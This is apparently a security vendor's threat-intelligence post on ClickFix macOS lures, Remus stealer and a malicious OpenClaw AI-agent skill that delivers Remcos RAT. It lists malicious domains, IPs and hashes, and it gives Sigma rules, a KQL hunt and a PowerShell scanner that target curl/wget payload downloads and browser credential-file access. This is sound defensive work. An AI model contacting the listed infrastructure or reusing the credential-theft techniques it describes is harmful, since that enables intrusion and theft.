Back to Intelligence

ClickFix macOS Lures, Remus Stealer, & OpenClaw RAT Supply Chain: OTX Pulse Analysis

SA
Security Arsenal Team
May 9, 2026
5 min read

Current OTX pulses indicate a convergence of sophisticated delivery mechanisms and evasive infostealers. Threat actors are actively leveraging ClickFix social engineering tactics against macOS users, utilizing fake troubleshooting blogs to distribute payloads like Macsync, Shub Stealer, and AMOS via malicious Terminal commands.

Simultaneously, the Windows ecosystem faces a dual threat: the evolution of Lumma Stealer into Remus, a 64-bit variant capable of bypassing browser Application-Bound Encryption, and the weaponization of the OpenClaw AI framework. The "DeepSeek-Claw" skill is being used to distribute Remcos RAT and GhostLoader through a supply chain attack involving a legitimate, signed GoToMeeting MSI installer that sideloads malicious DLLs.

Collectively, these campaigns aim at credential harvesting, cryptocurrency wallet theft, and establishing persistent remote access.

Threat Actor / Malware Profile

1. ClickFix Campaign (macOS)

  • Malware Families: Macsync, Shub Stealer, AMOS, PhantomPulse.
  • Distribution Method: SEO poisoning on blog sites offering fake macOS utilities. Victims are tricked into running curl/wget commands in Terminal.
  • Behavior: Exfiltration of system data and browser cookies.

2. Remus Stealer (Windows)

  • Lineage: Evolution of Lumma Stealer (v5 successor).
  • Capabilities: Bypasses Application-Bound Encryption (ABE) in Chrome/Edge to steal cookies and passwords. Uses innovative process injection and Etherhiding techniques.
  • C2: Utilizes Ethereum blockchain for C2 communication in some variants.

3. OpenClaw / Remcos RAT (Windows)

  • Distribution Method: Malicious "DeepSeek-Claw" skill within the OpenClaw AI agent framework.
  • Payload Chain: PowerShell command -> Downloads malicious MSI -> Legitimate signed GoToMeeting binary (G2MViewer.exe) -> Sideloads malicious DLL (Remcos/GhostLoader).
  • Behavior: Remote Access Trojan (RAT) capabilities, keylogging, and loader execution.

IOC Analysis

  • Domains (C2/Distribution): A mix of newly registered domains and compromised infrastructure. Key indicators include dropras.xyz and trackpipe.dev (OpenClaw/Remcos), and jihiz.com, kayeart.com (ClickFix).
  • IPv4 (C2): Hardcoded IPs such as 45.94.47.204 (ClickFix) and 217.156.122.0/24 range (Remus).
  • File Hashes (MD5/SHA1): Specific MD5 hashes provided for the malicious MSI packages and associated payloads (e.g., 1c267cab0a800a7b2d598bc1b112d5ce).

Operational Guidance: SOC teams should immediately block the listed domains and IPs at the perimeter firewall and proxy. The file hashes should be loaded into EDR detection engines for immediate scanning. The PowerShell commands used in the OpenClaw attack often involve msiexec or Invoke-WebRequest downloading from non-standard TLDs.

Detection Engineering

YAML
title: Suspicious macOS Terminal Downloading Executables (ClickFix)
id: 8a7b6c5d-4e3f-2a1b-9c8d-7e6f5a4b3c2d
description: Detects macOS Terminal processes attempting to download payloads via curl or wget, indicative of ClickFix social engineering.
status: experimental
date: 2026/05/10
author: Security Arsenal
references:
    - https://www.microsoft.com/en-us/security/blog/2026/05/06/clickfix-campaign-uses-fake-macos-utilities-lures-deliver-infostealers/
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    category: process_creation
    product: macos
detection:
    selection_terminal:
        Image|endswith: '/Terminal'
        ParentImage|endswith: '/Terminal.app/Contents/MacOS/Terminal'
    selection_tools:
        Image|endswith:
            - '/curl'
            - '/wget'
    selection_suspicious_args:
        CommandLine|contains:
            - 'http://'
            - 'https://'
    condition: all of selection_*
falsepositives:
    - Legitimate software installation via command line
level: high

---
title: Remcos RAT Sideload via GoToMeeting Installer
id: 9b8c7d6e-5f4a-3b2c-0d9e-8f7a6b5c4d3e
description: Detects the execution of the signed GoToMeeting binary (G2MViewer.exe) loading a malicious DLL from a non-standard path, associated with OpenClaw/Remcos campaigns.
status: experimental
date: 2026/05/10
author: Security Arsenal
references:
    - https://www.zscaler.com/blogs/security-research/malicious-openclaw-skill-distributes-remcos-rat-and-ghostloader
tags:
    - attack.defense_evasion
    - attack.t1574.002
logsource:
    category: image_load
    product: windows
detection:
    selection_sideload:
        Image|endswith: '\G2MViewer.exe'
    selection_dll:
        ImageLoaded|contains:
            - '\AppData\Local\Temp'
            - '\Downloads'
        ImageLoaded|endswith:
            - '.dll'
    filter_legit:
        Signed: 'true'
        ImageLoaded|contains:
            - '\Program Files (x86)\GoToMeeting'
            - '\Program Files\GoToMeeting'
    condition: selection_sideload and selection_dll and not filter_legit
falsepositives:
    - Rare; legitimate GoToMeeting loads DLLs from install directory
level: critical

---
title: Potential Remus Stealer Browser Data Access
id: 0c1d2e3f-4a5b-6c7d-8e9f-0a1b2c3d4e5f
description: Detects processes accessing browser 'Local State' or 'Login Data' files, a behavior consistent with Remus/Lumma Stealer bypassing encryption protections.
status: experimental
date: 2026/05/10
author: Security Arsenal
references:
    - https://cyberpress.org/remus-bypasses-browser-encryption/
tags:
    - attack.credential_access
    - attack.t1555.003
logsource:
    category: file_access
    product: windows
detection:
    selection_target:
        TargetFilename|contains:
            - '\Google\Chrome\User Data\Local State'
            - '\Google\Chrome\User Data\Default\Login Data'
            - '\Microsoft\Edge\User Data\Local State'
            - '\Microsoft\Edge\User Data\Default\Login Data'
    exclusion_browsers:
        Image|endswith:
            - '\chrome.exe'
            - '\msedge.exe'
            - '\brave.exe'
    condition: selection_target and not exclusion_browsers
falsepositives:
    - Legitimate password managers or backup utilities
level: high


kql
// Hunt for connections to known malicious IPs and domains from OTX Pulses
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("jihiz.com", "kayeart.com", "bintail.com", "wusetail.com", "malext.com", "miappl.com", "pla7ina.cfd", "dropras.xyz", "trackpipe.dev")
   or RemoteIP in ("45.94.47.204", "217.156.122.57", "217.156.122.75", "217.156.122.12", "45.151.106.110")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort
| extend ThreatIntel = "OTX ClickFix/Remus/OpenClaw"


powershell
# Hunt script for OpenClaw/Remcos associated File Hashes and Persistence
$maliciousHashes = @(
    "1c267cab0a800a7b2d598bc1b112d5ce",
    "2a5f619c966ef79f4586a433e3d5e7ba",
    "2c4b7c8b48e6b4e5f3e8854f2abfedb5",
    "82536825e700f4c863238a90dd314687",
    "cc1af839a956c8e2bf8e721f5d3b7373",
    "470c3803bd5a4770eb5470a84a831f187f591c64"
)

Write-Host "[+] Scanning for known malicious OpenClaw/Remcos file hashes..."

foreach ($hash in $maliciousHashes) {
    $path = Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
             Where-Object { (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash -eq $hash }
    
    if ($path) {
        Write-Host "[!] THREAT DETECTED: Malicious file found at $($path.FullName)" -ForegroundColor Red
    }
}

Write-Host "[+] Checking for suspicious persistence mechanisms..."
$regPaths = @("HKCU:\Software\Microsoft\Windows\CurrentVersion\Run", "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run")
foreach ($path in $regPaths) {
    if (Test-Path $path) {
        Get-ItemProperty $path | ForEach-Object {
            if ($_.PSObject.Properties -match "G2M" -or $_.PSObject.Properties -match "dropras") {
                Write-Host "[!] SUSPICIOUS PERSISTENCE found in $path" -ForegroundColor Yellow
            }
        }
    }
}

Response Priorities

  • Immediate: Block all IOCs (Domains and IPs) at the network edge. Isolate endpoints exhibiting PowerShell processes spawning msiexec.exe or G2MViewer.exe spawning unsigned DLLs.
  • 24h: Conduct a credential audit for users who may have interacted with the "DeepSeek-Claw" skill or visited the fake macOS utility blogs. Reset browser tokens/sessions due to the Remus encryption bypass capability.
  • 1 Week: Review and restrict the usage of unsanctioned AI agent frameworks and external code execution tools. Implement application control policies to prevent the execution of unsigned binaries masquerading as utilities.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-malwareremcos-ratremus-stealerclickfixopenclawmacos-malware

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action